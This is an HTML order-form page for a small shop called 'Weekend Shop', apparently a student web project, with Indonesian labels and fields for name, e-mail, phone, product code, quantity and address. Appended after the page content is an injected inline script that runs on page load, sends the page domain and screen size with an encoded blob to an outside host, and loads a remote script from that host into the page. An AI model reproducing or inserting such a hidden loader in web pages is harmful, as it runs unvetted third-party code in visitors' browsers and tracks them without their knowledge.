
<html>
	<head>
		<link rel="shortcut icon" href="file:///D|/Web UTS/PRESENTASI/tool kit/images/icontitle.png" type="image">

		<link rel="icon" href="file:///D|/Web UTS/PRESENTASI/tool kit/images/icontitle.png" type="image">
		
		<title>Weekend Shop | Order</title>
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		
<style>
* {
  box-sizing: border-box;
}
.menu {
  float:left;
  width:20%;
  font-family:verdana;
  text-align:center;
}
.menuitem {
  background-color:black;
  padding:8px;
  margin-top:7px;
  
}
a{
	color:black;text-decoration:none;

}
a:hover{
	color:#fbfbfb;text-decoration:none;



}
ul {

	list-style-type: none;
	margin: 0;
	padding: 0;
	overflow: hidden;
	background-color: #fbfbfb;
}
li{
	float: left;
	color:#000;

}
li a{
	display: block;
	color: #000;
	text-align: center;
	padding: 14px 16px;
	text-decoration: none;
}
li a:hover:not(.active){
	background-color: black;
	color: #F00;
}
.active{
	background-color: #008CBA;
	color: white;
}


.main {
  background-color: #fafafa;
  margin-top: 10px;
  float:left;
  width:80%;
  padding:0 20px;
  font-family:verdana;
}

.img-responsive{
	display:block;
	max-width:100%;
	height:auto
}

input[type=text], select {
    width: 50%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
    size: 50;
    box-sizing: border-box;
}

textarea{
    width: 50%;
    height: 150px;
    padding: 12px 20px;
    box-sizing: border-box;
    border: 2px solid #ccc;
    border-radius: 4px;
    background-color: #fafafa;
    resize: none;
	color:#000;
}

input[type=submit] {

    width: 10%;
    background-color: white;
    color: black;
    padding: 14px 20px;
    margin: 8px 0;
    border: 2px solid #008CBA;
    border-radius: 4px;
    cursor: pointer;
}
input[type=reset] {

    width: 10%;
    background-color: white;
    color: black;
    padding: 14px 20px;
    margin: 8px 20;
    border: 2px solid #fafafa;
    border-radius: 4px;
    cursor: pointer;

}

input[type=submit]:hover {
    background-color: #008CBA;
    color: white;
}
input[type=reset]:hover {
    background-color: #008CBA;
    color: white;
}

@media only screen and (max-width:620px) {
  /* For mobile phones: */
  .menu, .main, .right {
    width:100%;
  }
}
</style>
	</head>

	<body background-color="white">
		<font color="fafafa">


		<div style="background-color:#fff;padding:1px;text-align:left;">
			<img src="img/logo.png">
		</div>
		
		<ul>
			<li><a href="index.html">HOME</a></li>

		</ul>


		
		<br>
	
					<font face="verdana">
				
		</div>
	</font>
		
		<font color="black">
			
	
		<div class="main">

			<font face="verdana">


					<h3 style="text-align: justify;">Form Pemesanan</h3>
					<p dir="ltr"><span>Silahkan isikan data anda dengan benar pada form dibawah ini </span><span></span></p>

					 <form action="proses.php" method="post">
				    <label for="fname">Nama Lengkap</label><br>
				    <input type="text" id="fname" name="nama" placeholder="Masukan Nama Anda.."><br>
				    <label for="lname">E-mail</label><br>
				    <input type="text" id="lname" name="mail" placeholder="Masukan E-mail Anda.."><br>
				    <label for="lname">Nomor Handphone</label><br>
				    <input type="text" id="lname" name="hp" placeholder="Masukan Nomor Anda.."><br>
				     <label for="tipe">Jenis Produk</label><br>
				    <input type="text" id="lname" name="kode" placeholder="Masukan Kode Produk.."><br>
				    <label for="lname">Jumlah Produk</label><br>
				    <input type="text" id="lname" name="jumlah" placeholder="Masukan Jumlah Produk.."><br>
				    <label for="kelamin">Jenis Kelamin</label><br>
				    <select id="kelamin" name="kelamin">
				      <option value="pria">Pria</option>
				      <option value="wanita">Wanita</option>
				    </select>
				    <br>
				    <label for="country">Alamat</label><br>
				    <font face="verdana">
				    <textarea name="alamat">
					</textarea>
				    </font><br>

				  
				    <input type="submit" value="Beli"><input type="reset" value="Reset">
				  </form>

				
				
			</font>
				

			<br><br>


		</div>


	
		</div>
		<div style="background-color:#fafafa;text-align:center;padding:10px;margin-top:7px;">
			<table width=100%>
				<tr>
					<td width="350px" heigth="66px">
					</td>
					<td width="350px" heigth="66px">
						</td>
			</table>


		</div>
	</font>
	<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m1T0H6KosYc2MWHvrpLkJ8SYmUyoEdhfRN8hbIEIHmqLvhAmzOYzN%2b4jILnwOcJf8LV%2fAFntqQUf7zdWVBhNFGFz1hKeAM5DeGI4%2f%2bsCm9rTQaIJRjoTFxzGy9q%2bBKGksd0pHAV2QCU1FlFCayxby7Eh8no%2b5aWfJWCAxvqWxlBH1JIeZ970SlIDprVg9nbhlWFMRkIBrKSWcF%2bD4Xyr2vbnt4idvFR%2fekuiTYuFcgkC%2f2GZSUwbfDr9y1ntpnTeHI9HIHNLwuMemLPSvMmdR5ufRWLiJb16RcxKZJrXjp4cIIWDUHNEpSKeIqy4c0aRTe96z74r%2b23KP3htRKlvhtrqUr5wTwM4jIbpTxwJ18ISjAIfylWy%2fv36LWgaSxFLR%2fMmKlCpH4tERwoLHgwWJBL5Z28ALOhCaIffwr542uMTrIR8GMmkEhjMjCL6kEgg4wy9ASdpF92oUWTKIbELEqXosoG4HAE9gzWT4lBWqRb85OsWCurFey%2fB59gpYglnbTlW3rHDqw3QTNcTkAhwIbzhwFwX3NvO5P4VlvYaPEec%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>



</html>